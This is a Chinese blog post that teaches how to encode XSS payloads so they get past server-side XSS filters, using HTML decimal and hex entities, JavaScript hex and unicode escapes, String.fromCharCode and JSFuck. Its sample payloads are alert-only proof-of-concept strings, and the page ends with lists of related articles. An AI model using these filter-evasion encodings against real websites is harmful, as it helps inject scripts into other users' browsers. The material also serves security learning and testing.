XSS注入-XSS中的编码

最新推荐文章于 2024-04-26 16:35:31 发布
最新推荐文章于 2024-04-26 16:35:31 发布
阅读量2.7k 收藏 6
点赞数 1
分类专栏: XSS跨站
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_25899635/article/details/90577336
版权

字符编码的作用
  在实际环境中,XSS注入的脚本很可能会被XSS Filter过滤,这是就可以尝试使用不同的字符编码进行绕过服务端检查,同时也可以更好的隐藏shellcode。在线编码地址: https://www.toolmao.com/xsstranser
在这里插入图片描述

HTML编码
  HTML标签中的某些属性值可以使用 &#ASCII方式进行编码改写,并且支持十进制和十六进制。例如将 中的javascript:alert(‘xss’)进行编码:
  &#十进制ASCII: javascript:alert('xss')
  XSS Exploit: <img src="&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#120;&#115;&#115;&#39;&#41;" />
  也可以不加;
  &#十六进制ASCII:采用&#加多个0: &#x006a;&#x0061;&#x0076;&#x0061;&#x0073;&#x0063;&#x0072;&#x0069;&#x0070;&#x0074;&#x003a;&#x0061;&#x006c;&#x0065;&#x0072;&#x0074;&#x0028;&#x0027;&#x0078;&#x0073;&#x0073;&#x0027;&#x0029;

JS编码
  例如将eval(alert(‘xss’))中的js进行js编码:
  十六进制\x61\x6c
  \x65\x76\x61\x6c\x28\x61\x6c\x65\x72\x74\x28\x27\x78\x73\x73\x27\x29\x29
  unicode \u0061\u006c
  \u0065\u0076\u0061\u006c\u0028\u0061\u006c\u0065\u0072\u0074\u0028\u0027\u0078\u0073\u0073\u0027\u0029\u0029

String.fromCharCode
  String.fromCharCode(97,108,101,114,116,40,39,120,115,115,39,41)

jsfuck编码
参考网址:http://www.jsfuck.com/
https://github.com/aemkei/jsfuck/blob/master/jsfuck.js
实际用途:绕过javascript

Mandorr
关注
  • 1
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
编码XSS的应用
Cwillchris的博客
07-10 743
一、使用编码绕过过滤-进行 XSS 注入1、Stage #15 十六进制绕过Stage #15 地址: https://xssquiz.int21h.jp/stage__15.php?sid=bdebf58d6cee62495a283af53d445e874dcfcad0输入的信息会在页面下方的黑色文本框显示。尝试直接注入 payload: ">alert(document.dodomainmain);输入的双引号和左右尖括号全部转义成了实体字符编码。使用十六进制进行绕...
XSS编码
weixin_46611504的博客
03-24 2087
一:html编码 背景:html编码是用于输出html原本的标签的 比如我想在页面上输出div标签,但是如果我在html标签里直接写的话,就会被当成div标签执行,并不会输出在页面上,这个时候我想将他输出在页面上就需要用html编码 XSS的应用:这种编码的形式可以用来去绕过一些过滤,比如,有些会过滤掉script ,alert,< >这样的危险的符号,这个时候,就可以用Html编码...
XSS-Codec XSS代码转换工具
01-14
XSS代码转换工具,用于XSS代码的转换
XSS注入(跨站脚本攻击)原理与实践
最新发布
打工人的自我修养
04-26 1431
XSS注入是一种最普遍的网站应用程式的安全漏洞攻击,允许恶意使用者将程式码注入到网页上,其他使用者在观看网页时就会受到影响。这类攻击通常包含了HTML以及使用者端脚本语言。
XssEncode
weixin_33674976的博客
01-24 225
0x00 闲扯 好吧继上一篇文章之后,就没发文章了!(其实是一直在写但是写的很少还凑不起一篇文章而已) 但是这几天对插件进行了一定的改良了 因为在自己在实际的XSS过程也发现了自己的插件 还不够强大! 不能够百分之百的满足自己的需求!所以就根据自己平常的需求给加了上去! 我想做到玩XSS一个工具即可解决需求!所以感觉即使是现在的插件也还有很大的不足! 所以很希望得到你们的意见 ...
XSS跨站攻击,注入代码整理,大全
03-03
XSS跨站攻击,注入代码整理,希望大家支持
XSS编解码辅助工具——XSS Codec
weixin_30814223的博客
08-13 298
很久之前,在Linux_情的博客里看到了一个编解码工具,hta格式,当时下载后感觉功能不太全就放在那没管了,今天无意又看到了这个工具,于是自己把它完善了一下,增加了一些功能如下: ①16进制[0x]编解码; ②escapeAll编码; ③base64编解码; ④更换了图标“海豚”。 附下载地址 转载于:https://www.cnblogs.com/la...
安全代码-(sql注入\xss 工具)
dingding_java的博客
11-18 312
1、过滤SQL 、过滤XSS脚本内容 package com.walmart.pricelock.util; import java.util.HashMap; import java.util.Map; import java.util.regex.Pattern; /** * * @ClassName: XssUtil * @Description: XssUtil * @Date: 2020/11/12 19:43 **/ public class XssUtil { pri
xss-labs-master.zip(xss注入通关游戏/靶场)
03-21
**XSS注入详解** XSS(Cross Site Scripting),即跨站脚本攻击,是一种常见的Web应用程序安全漏洞。它允许攻击者在用户浏览器上执行恶意脚本,从而获取敏感信息、操控用户行为或进行钓鱼攻击。`xss-labs-master....
xss-labs-master.rar
05-09
XSS(Cross-site scripting)是一种常见的Web应用程序安全漏洞,允许攻击者在用户浏览器注入恶意脚本。"xss-labs-master.rar" 提供了一个针对XSS漏洞的专项练习平台,旨在帮助初学者及安全爱好者提升对XSS攻击的...
xss-platform-master.zip
04-21
XSS攻击是一种恶意代码注入方式,攻击者通过在Web页面插入恶意脚本,使得用户在不知情的情况下执行这些脚本,从而窃取用户数据或者进行其他恶意操作。XSS攻击通常分为三种类型:反射型XSS、存储型XSS和DOM型XSS。 ...
XSS辅助工具-crx插件
03-09
XSS辅助工具 wooyun原地址:http://zone.wooyun.org/content/7678,我只是大自然搬运工小雷锋~ 版本权所有 wooyun wiluilu~ 感谢分享,希望继续完善~ 在线版使用说明: 1. 常用XSS转码 2. 盲打代码自动输入(f4) 3. 可以在插件页,点击【盲打】设置,要使用的外js连接 第一次写插件,请大家,多多提建议。 XSS辅助工具本地版:http://dl.vmall.com/c05li5yuok 本地版插件的使用方法如下: 1. 打开chrome转到chrome://extensions/页,把codex.crx拖进去,即可安装 2. 按f4可以在选定的文本输入框(input、textarea)输入默认的盲打代码 3. 在插件页可以点击【盲打】按钮,输入盲打时要用到的外部js链接对盲打 代码的外部js链接进行设置 4. 在插件页的输入框输入要转码的字符,进行转码 支持语言:文 (简体)
xss-demo-master.zip
04-21
XSS(Cross Site Scripting)攻击是一种常见的网络安全问题,它发生在Web应用,允许攻击者通过注入恶意脚本到网页上,从而影响到其他用户。"xss-demo-master.zip"这个压缩包很可能是为教育和演示XSS攻击而准备的一...
java防止xss注入
07-15
总结来说,防止JavaXSS注入需要从多个层面出发,包括但不限于数据过滤、字符转义、输入验证、使用安全库和框架、设置HTTP头部策略以及采用最佳实践。通过综合运用这些手段,可以有效地降低XSS攻击的风险,保护...
xss修复html实体编码,【XSS字符编码神器 Chrome插件图文介绍】XSS字符编码神器 Chrome插件图片教程 - 开发者插件 - Chrome插件网...
weixin_39942488的博客
06-29 347
作者:0x_Jin XSS字符编码神器,集合了html,js,base6,utf-7,utf-8JP等编码!随后又添加HttpOnly Cookie泄露扫描以及第三方资源探测等等!如果机器配置比较低可能会有点卡顿。在后续版本会解决此问题的本插件已更新 20141011由0x_Jin授权于Uncia代发布 XSS字符编码神器~———————————————————V2.5修复了某些细节上的BUGV2...
一、XSS加解密编码解码网址
黑日里不灭的light
10-23 361
解释:直接去使用burpsuite里面的编码解码模块较为好用,而且所有字符都回被编码或者解码。解释:这个网站相对比较靠谱,
xss编码两次_XSS平台简单使用
weixin_39559804的博客
12-18 250
XSS常用语句及编码绕过XSS常用的测试语句有:alert(1)常见的XSS的绕过编码有JS编码、HTML实体编码和URL编码JS编码JS提供了四种字符编码的策略,如下所示。三个八进制数字,如果个数不够,在前面补0,例如“e” 的编码为“\145” ;两个十六进制数字,如果个数不够,在前面补0,例如"e" 的编码为"\x65" ;四个十六进制数字,如果个数不够,在前面补0,例如"e" 的编码为“\...
XSS易容术---bypass之编码混淆篇+辅助脚本编写
chengman3837的博客
01-05 503
一、前言 本文原创作者:vk,本文属i春秋原创奖励计划,未经许可禁止转载! 很多人对于XSS的了解不深。 一提起来就是:“哦,弹窗的”、”哦,偷cookie的。” 骚年,你根本不知道什么是力量。虽然我也不知道,哈哈。 好了,不瞎扯了,进入今天的主题: XSS易容术---bypass之编码混淆 ...
XSS编码剖析
代码析构师的专栏
09-16 686
0×00 引言 很多不了解html、js编码的童鞋挖掘xss漏洞时,都是一顿乱插,姿势对了,就能获得快感,姿势不对,就么反应。另外在freebuf里,有很多文章介绍过跨站编码,有兴趣的,可以搜索下。 本文介绍常见的编码方法,能力不足,如有其他意见,请指正。 0×01 常用编码 URL编码:一个百分号和该字符的ASCII编码所对应的2位十六进制数字,例如“/”
理解XSS注入:基础与实战
xss注入讲解ppt.pptx” 本文将深入探讨XSS(跨站脚本)注入的基础知识,包括其定义、危害、历史背景以及简单的原理和环境搭建。XSS攻击是Web应用安全领域最常见的漏洞之一,它允许攻击者在用户浏览器执行恶意...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值